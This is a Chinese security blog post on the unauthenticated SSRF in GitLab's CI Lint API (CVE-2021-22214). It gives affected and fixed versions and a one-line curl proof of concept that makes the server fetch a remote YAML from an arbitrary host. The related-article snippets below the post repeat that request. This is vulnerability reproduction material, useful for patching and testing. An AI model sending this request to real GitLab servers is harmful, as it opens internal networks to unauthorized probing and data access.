追洞计划 | Gitlab CI Lint API未授权 SSRF漏洞(CVE-2021-22214)

最新推荐文章于 2024-05-16 11:53:35 发布
最新推荐文章于 2024-05-16 11:53:35 发布
阅读量6k 收藏 3
点赞数 2
文章标签: java git 安全 gitlab docker
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shuteer_xu/article/details/118124513
版权

文章来源|MS08067 Web安全知识星球

本文作者:Taoing(Web安全攻防合伙人)

GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来的Web服务。

一、漏洞描述

GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。

CVE-2021-22214

GitLab存在前台未授权SSRF漏洞,未授权的攻击者也可以利用该漏洞执行SSRF攻击(CVE-2021-22214)。该漏洞源于对用户提供数据的验证不足,远程攻击者可通过发送特殊构造的 HTTP 请求,欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求。

二、漏洞影响

  app="GitLab"

影响版本:从 10.5 开始的所有版本

安全版本:官方当前最新的 13.12.2, 13.11.5 和 13.10.5

三、POC:

curl -s --show-error -H 'Content-Type: application/json' https://example.gitlab.com/api/v4/ci/lint --data '{ "include_merged_yaml": true, "content": "include:\n  remote: http://xx.xxx.xx.xx:port/api/v1/targets?test.yml"}'

四、漏洞复现:

1、环境搭建

搭建环境介绍:CentOS7.6

1)首先按官网提示先安装依赖,然后执行下面命令添加yum源,选择gitlab-ce社区版

curl -s https://packages.gitlab.com/install/repositories/
最低0.47元/天 解锁文章
Ms08067安全实验室
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
常见poc漏洞模块,直接导入用。
07-22
一些只有你自己知道的漏洞,或者比较偏门的漏洞,就需要咱们自己来编写PoC或者是EXP。因为Goby没有开源,所以也能编写一些基于http命令执行的漏洞
(CVE-2021-22214)Gitlab SSRF漏洞 漏洞复现
鸣蜩十四的博客
08-09 2532
简介 GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来的Web服务。 漏洞描述 GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。GitlabCI lint API用于验证提供给gitlab ci的配置文件是否是yaml格式。而根据其说明文档文档,其include 操作支持remote选项,用于获取远端的yaml。因此在此处将
CVE-2021-22205——Gitlab 远程命令执行漏洞复现(1)
最新发布
2401_84519718的博客
05-16 450
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
CVE-2021-22214 Gitlab_SSRF
weixin_45945976的博客
12-15 2681
CVE-2021-22214 Gitlab_SSRF 漏洞复现: 目标地址:https://gitlab.xxx.xxx/users/sign_in POC curl -s --show-error -H 'Content-Type: application/json' https://gitlab.xxx.xxx/api/v4/ci/lint --data '{ "include_merged_yaml": true, "content": "include:\n remote: http://fbnw
生命在于研究——CVE-2021-22214记录
易水哲的博客
09-28 355
GitLab存在前台授权SSRF漏洞授权的攻击者也可以利用该漏洞执行SSRF攻击(CVE-2021-22214)。该漏洞源于对用户提供数据的验证不足,远程攻击者可通过发送特殊构造的 HTTP 请求,欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求。
[CVE-2021-22214]Gitlab SSRF 授权访问漏洞
whoami
04-13 3325
一、影响版本 13.10.5 > GitLab >= 10.5 13.11.5 > GitLab >= 13.11 13.12.2 > GitLab >= 13.12 二、漏洞POC curl -s --show-error -H 'Content-Type: application/json' http://127.0.0.1:55001/api/v4/ci/lint --data '{ "include_merged_yaml": true, "con
pre-commit-gitlabci-lint:提交Gitlab CI配置的预提交钩子
05-08
使用/api/v4/ci/lint lint端点来验证.gitlab-ci.yml文件的内容。 默认情况下,将您的配置发送到 ,但这可以被覆盖,请参见下文。用法GitLab Lint API现在。 使用api范围。 将访问令牌值设置为GITLAB_TOKEN环境变量...
GitLab CI Lint - UI Enhancer-crx插件
04-01
gitlab ci lint - ui增强器试图改善使用CI Lint工具的用户体验的CI Lint体验可在Gitlab.com上获得Gitlab.com上的CI Lint在今天的单行中显示每个脚本的CI管道作业脚本代码,无论脚本的长度如何,也没有语法突出显示...
gitlab-ci-lint:gitlab-ci cli到lint .gitlab-ci.yml文件
04-29
gitlab-ci-lint gitlab-ci cli到lint .gitlab-ci.yml文件 用法 安装 npm install -g gitlab-ci-lint 命令行界面 Usage: gitlab-ci-lint [options] Options: -h, --help output usage information -V, --...
gitlab-lint:开源的gitlab linting实用程序
03-03
gitlab-lint API和收集器 开源gitlab linting实用程序 前端 如何安装 安装依赖项 高朗 码头工人 预先提交 戈兰奇棉绒 开发依赖项: make setup 创建Gitlab访问令牌 您应该创建一个个人访问令牌: 登录到GitLab。 ...
gitlab SSRF(CVE-2021-22214
YouthBelief的博客
11-11 1734
gitlab SSRF CVE-2021-22214gitlab SSRF(CVE-2021-22214)0x01 漏洞描述0x02 影响范围0x03 漏洞复现curl检测脚本检测0x04 漏洞修复 gitlab SSRF(CVE-2021-22214) 0x01 漏洞描述 GitLab存在前台授权SSRF漏洞。该漏洞源于对用户提供数据的验证不足,远程攻击者可通过发送特殊构造的 HTTP 请求,欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求。 0x0
Goby-poc 161个
07-05
Goby自定义poc
Python-GitLab1147SSRF配合redis远程执行代码
08-10
GitLab 11.4.7 SSRF配合redis远程执行代码
Gitlab SSRF 漏洞复现 CVE-2021-22214
afei001
08-03 1169
GitLab 是一个用于仓库管理系统的开源项目,使用 Git 作为代码管理工具,并在此基础上搭建起来的 Web服务。当对内部网络的webhook的请求被启用时,GitLab CE/EE中一个服务器端请求伪造漏洞SSRF(影响从10.5开始的所有版本)就有可能被经身份验证的攻击者利用,即使是在注册受限的GitLab实例上。...
GitLab Graphql邮箱信息泄露
自强不息
06-21 738
生活不能等待别人来安排,要自已去争取和奋斗;而不论其结果是喜是悲,但可以慰藉的是,你总不枉在这世界上活了一场。 ​
Gitlab SSRF(CVE-2021-22214)
m0_65150886的博客
02-02 276
当13.10.5 > GitLab >= 10.5、13.11.5 > GitLab >= 13.11、13.12.2 > GitLab >= 13.12时,远程攻击者可通过发送特殊构造的 HTTP 请求,欺骗应用程序向任意系统发起请求。而根据其说明文档文档,其include操作支持remote选项,用于获取远端的yaml。GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。
CVE-2020-1066 任意文件替换漏洞分析和利用
被遗弃的庸才博客
03-07 999
1、背景 漏洞是作者cbwang505发现的,并且作者本人在他的GitHub上传了EXP的利用代码,由于这个和RPC相关,自己也研究过RPC,所以分析了一下。但是在具体实现过程中自己遇到了很多问题,这里将它记录下来,同时帮助想要了解任意文件替换漏洞的同学入门(虽然自己也是菜狗)。任意文件替换漏洞的原理可以在这里了解一下,本文也会简单介绍一下任意文件替换漏洞是怎么产生的,以及我们怎么去利用。 首先每一个文件和文件夹都有它的访问属性如下所示,每一个用户对它的操作权限也不尽相同,从下面两张图可以看出syste
ModSecurity网站防火墙安装教程加WEB防御规则设置
云博客_资源宝分享
02-12 2027
ModSecurity网站防火墙安装教程加WEB防御规则设置
【严重】GitLab 存在代码执行漏洞
murphysec的博客
06-01 778
墨菲安全是一家为您提供专业的软件供应链安全管理的科技公司,核心团队来自百度、华为、乌云等企业,公司为客户提供完整的软件供应链安全管理平台,围绕SBOM提供软件全生命周期的安全管理,平台能力包括软件成分分析、源安全管理、容器镜像检测、漏洞情报预警及商业软件供应链准入评估等多个产品。产品可以极低成本的和现有开发流程中的各种工具一键打通,包括 IDE、Gitlab、Bitbucket、Jenkins、Harbor、Nexus 等数十种工具无缝集成。gitlab@影响所有版本。
可能存在CI Lint过不了但gitlab能过得情况吗?
07-14
是的,有可能存在CI Lint无法通过但是GitLab仍然可以通过的情况。 CI Lint是一个基本的语法检查工具,它主要用于检查`.gitlab-ci.yml`文件的语法和配置问题。它会检查常见的语法错误、缩进问题、无效的关键字等。 然而,CI Lint并不能完全模拟和验证实际的CI/CD环境。它只是对语法进行检查,而无法检测作业脚本中的实际问题和逻辑错误。 在实际运行作业时,可能会出现一些CI Lint无法捕捉到的问题,例如脚本中的语法错误、依赖不满足、网络连接问题等。这些问题只有在作业运行时才会显现出来。 因此,即使CI Lint通过了检查,仍然有可能在GitLab运行作业时出现错误。因此,建议在提交`.gitlab-ci.yml`文件之前进行本地测试和代码审查,以确保作业在实际运行时能够按预期工作。 希望这些信息对您有所帮助。如果您还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值